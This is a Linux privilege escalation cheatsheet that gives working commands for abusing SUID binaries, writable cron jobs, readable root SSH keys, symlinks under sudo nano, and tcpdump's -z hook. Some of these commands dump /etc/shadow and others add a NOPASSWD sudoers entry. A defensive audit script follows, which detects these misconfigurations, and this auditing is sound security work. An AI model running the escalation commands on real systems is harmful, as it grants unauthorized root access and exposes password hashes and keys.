Local Privilege Escalation

SUID

find / -perm -4000 2>/dev/null

Exploitation depends on what the SUID binary does: one that reads or writes arbitrary files can be used to grab SSH keys or the shadow file.

Cron

# Find cron files that other users can write to
find /etc/cron* -type f -perm -o+w -exec ls -l {} \;

# Check when each job runs and as which user
cat /etc/crontab

# Add a job that copies the shadow file somewhere readable
echo -e '#!/bin/bash\n/bin/cat /etc/shadow > /tmp/shadow' > /etc/cron.hourly/oddjob

Readable SSH

# List root's home directory
ls -la /root

# List root's .ssh directory
ls -la /root/.ssh

# Read the key (worth trying even if you can't list the contents of .ssh)
cat /root/.ssh/id_rsa

# Make an SSH dir
mkdir /home/<user>/.ssh

# Copy the key into it
cp /root/.ssh/id_rsa /home/<user>/.ssh

# Restrict permissions: ssh refuses a private key that group or others can read
chmod 600 /home/<user>/.ssh/id_rsa

# SSH
ssh -i /home/<user>/.ssh/id_rsa root@localhost

Symlink

# Check sudo rights
sudo -l

# If you have sudo rights for something like nano on a specific file,
# create a symlink from that file to shadow and then read it.
# The file in this example is readme.txt
ln -s /etc/shadow readme.txt

# Set a terminal type nano can use
export TERM=xterm

# Read file
sudo nano readme.txt

TCPDump

# If tcpdump is in the sudo list then we can abuse it:
# -z runs a command when the capture file rotates, and -Z root runs it as root

# Create the file /tmp/elevate
cat > /tmp/elevate <<'EOF'
#!/bin/bash
echo "james ALL=(root) NOPASSWD: ALL" >> /etc/sudoers
EOF

chmod +x /tmp/elevate

sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/elevate -Z root

sudo bash
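The script below is added here as the defender's counterpart to the SUID, Cron, Readable SSH, Symlink and TCPDump sections above; it is not part of the original cheatsheet. It audits a host, or any tree given as a root directory (a mounted disk image works), for the misconfigurations each section relies on: SUID binaries outside an expected baseline, cron files that group or other users can write, root private keys that group or other users can read, and sudo rules that grant anything without a password or that grant an editor, a pager or tcpdump at all. The baseline list of SUID names, the constructed sample tree and every name in it are assumptions for the demo.

```sh
#!/bin/sh
# Added audit script (not part of the original cheatsheet). Each check takes a
# root directory, so it runs on the live host ("/"), on a mounted image, or on
# the constructed sample tree below. One finding per line; run_all adds a count.

# SUID binaries that are not in the expected baseline. The baseline names are
# an assumption for illustration; derive the real list from a clean build.
suid_audit() {
  root="${1%/}"
  find "${root:-/}" -xdev -type f -perm -4000 2>/dev/null | while read -r f; do
    case "$(basename "$f")" in
      su|sudo|passwd|mount|umount|ping|chsh|chfn|newgrp|gpasswd|fusermount|fusermount3) ;;
      *) echo "SUID   $f" ;;
    esac
  done
}

# Cron tables or jobs that group or other users can modify (-perm /022).
cron_audit() {
  root="${1%/}"
  find "$root/etc/crontab" "$root"/etc/cron* -type f -perm /022 2>/dev/null |
    while read -r f; do echo "CRON   $f"; done
}

# Private keys under root's .ssh that group or other users can read (-perm /044).
ssh_key_audit() {
  root="${1%/}"
  find "$root/root/.ssh" -type f ! -name '*.pub' -perm /044 2>/dev/null |
    while read -r f; do echo "SSHKEY $f"; done
}

# sudo rules that grant anything without a password, or that grant an editor,
# a pager or tcpdump (each can read or write arbitrary files as root).
sudo_audit() {
  root="${1%/}"
  for f in "$root/etc/sudoers" "$root"/etc/sudoers.d/*; do
    [ -f "$f" ] || continue
    grep -nE '^[^#]*=.*(NOPASSWD:|(/|[[:space:]])(nano|vi|vim|less|more|tcpdump)([[:space:]]|,|$))' "$f" |
      sed "s|^|SUDO   $f:|"
  done
}

# Run every check and finish with a summary line ("findings: N").
run_all() {
  root="${1%/}"
  n=0
  for check in suid_audit cron_audit ssh_key_audit sudo_audit; do
    out=$("$check" "$root")
    if [ -n "$out" ]; then
      printf '%s\n' "$out"
      n=$((n + $(printf '%s\n' "$out" | wc -l)))
    fi
  done
  echo "findings: $n"
}

# Constructed sample tree (all names and contents are made up for the demo):
# one baseline SUID binary and one rogue one, a world-writable cron job next to
# a sane one, a readable root key next to a protected one, and a sudoers file
# with two risky rules. Prints the directory; the caller removes it.
make_sample_root() {
  r=$(mktemp -d)
  mkdir -p "$r/usr/bin" "$r/etc/cron.hourly" "$r/etc/cron.daily" "$r/root/.ssh"
  : > "$r/usr/bin/passwd";            chmod 4755 "$r/usr/bin/passwd"
  : > "$r/usr/bin/backup";            chmod 4755 "$r/usr/bin/backup"
  : > "$r/etc/cron.hourly/oddjob";    chmod 666  "$r/etc/cron.hourly/oddjob"
  : > "$r/etc/cron.daily/logrotate";  chmod 755  "$r/etc/cron.daily/logrotate"
  : > "$r/root/.ssh/id_rsa";          chmod 644  "$r/root/.ssh/id_rsa"
  : > "$r/root/.ssh/id_ed25519";      chmod 600  "$r/root/.ssh/id_ed25519"
  : > "$r/root/.ssh/id_rsa.pub";      chmod 644  "$r/root/.ssh/id_rsa.pub"
  printf '%s\n' 'Defaults env_reset' \
    'root ALL=(ALL:ALL) ALL' \
    'james ALL=(root) NOPASSWD: /usr/bin/nano /opt/readme.txt' \
    'alice ALL=(root) /usr/sbin/tcpdump' \
    'bob ALL=(root) /usr/bin/apt' > "$r/etc/sudoers"
  echo "$r"
}

# Usage: sh audit.sh /        audit the live host (run as root to see /root/.ssh)
#        sh audit.sh --demo   audit the constructed sample tree (5 findings)
case "${1:-}" in
  --demo) r=$(make_sample_root); run_all "$r"; rm -rf "$r" ;;
  "") ;;
  *) run_all "$1" ;;
esac
```

Each check prints nothing on a clean tree, so the script drops into a cron job or a configuration-management check as-is; the only tuning a real host needs is the SUID baseline, which should come from a freshly installed image of the same build rather than from the list hard-coded here.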

Last updated 4 years ago